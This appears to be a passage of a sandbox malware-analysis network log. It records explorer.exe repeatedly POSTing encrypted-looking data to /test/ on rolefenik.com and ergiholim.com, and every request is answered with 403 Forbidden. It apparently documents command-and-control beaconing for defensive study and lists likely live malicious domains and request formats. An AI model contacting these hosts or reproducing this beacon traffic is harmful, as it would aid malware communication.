                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=144636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20037&cwnd=32&unsent_bytes=0&cid=333774c6181703ba&ts=806&x=0"
                                                                                                                                          2024-11-13 17:22:09 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          21192.168.2.650012104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:09 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:09 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:10 UTC753INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:10 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z3k%2FFgQG5RN8Zh34Ryei8ARZBOyZpwKDrnJe07HXlaZUkY5rC25aLsW85I65t%2FzBNiO03ASrrnlNMavmXKlagT5f%2BT4XrRVK6btd9vXeMJ7%2BUENpagHji1%2FoNm0IeM0N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20713bae1728e8-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=2258970&cwnd=241&unsent_bytes=0&cid=b9f830ac4404c89f&ts=412&x=0"
                                                                                                                                          2024-11-13 17:22:10 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          22192.168.2.650013104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:11 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:11 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:11 UTC750INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:11 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lE99fMUywD0D83ClWp8fkDocta8SIrOUqVJhbllZK8BOalTHQb2le%2B6FpN%2Fpfa3RfRRL%2BnJiRsMJo1t4tqAzWiwr1FRvRquLMzp7tg4gsBbOecOQfbosDT7%2BnuBXBpnb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20714488bce381-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137933&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=21153&cwnd=32&unsent_bytes=0&cid=947b1b9a7ade8918&ts=624&x=0"
                                                                                                                                          2024-11-13 17:22:11 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          23192.168.2.650014104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:12 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:12 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:13 UTC750INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vBtSPqmxyrDyJkwix5qrnt1vDvxLIih5%2BzmEa8Mpg26g5%2FRfxNfvqAevPswy1rH37yK9PPgZOftMqPWbbuuFJr4o%2FpRf1w0GjVs2bTqc9xu5Ty1mkm4dbJXT%2B3egor2x"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20714e1cd97343-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=159109&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=19007&cwnd=32&unsent_bytes=0&cid=d108ffc8d6860c68&ts=744&x=0"
                                                                                                                                          2024-11-13 17:22:13 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          24192.168.2.650015104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:14 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:14 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:15 UTC754INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:14 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tvSmXj%2F%2FqmB6eitwB0UhijrFrICaGR%2FWE06adn4uaNGIw872uHPkLIeDMAH8JT%2FnqCUnadLM748brKiJAGQ5iaqZPJ40m%2B2pD3pwRXVYPgCIU5tJ%2BhKvHNcfekodJbq5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071582e11d75c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130440&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=22173&cwnd=32&unsent_bytes=0&cid=79abd2e80f78800c&ts=811&x=0"
                                                                                                                                          2024-11-13 17:22:15 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          25192.168.2.650016104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:15 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:15 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:16 UTC760INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0oLqfR3iLDMGNOiUQ2gOoNu%2BetsYhNLbtJ5e11e3MkZa9AmZrDwdn02mP1zuSr9C9fsl%2FBrmK3TxagTdZTzw2XR8amlG%2F%2F%2Fp%2BWvS%2ByqaBU%2FGQ%2BxgpaQCYHqMs7xPYn4Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207162b8d68072-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130311&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=22228&cwnd=32&unsent_bytes=0&cid=6e9b253a75976fe3&ts=710&x=0"
                                                                                                                                          2024-11-13 17:22:16 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          26192.168.2.650017104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:17 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:17 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:17 UTC747INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:17 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cStJcZhAMkzdJIeXYFhmbgRIS0hVWpDULUOP%2BXC9Q8iVBG9pbLYnwz5VzmxR%2FIiBUwtqkIkkRCFg4Kkz8Xr649eEYsAPsp4aiF79HW2gmtZ8aqOMOpjtvpZNgeEOOes6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20716ab9e2e83f-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=1678840&cwnd=251&unsent_bytes=0&cid=26728fb0c55359b4&ts=439&x=0"
                                                                                                                                          2024-11-13 17:22:17 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          27192.168.2.650018104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:22:18 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
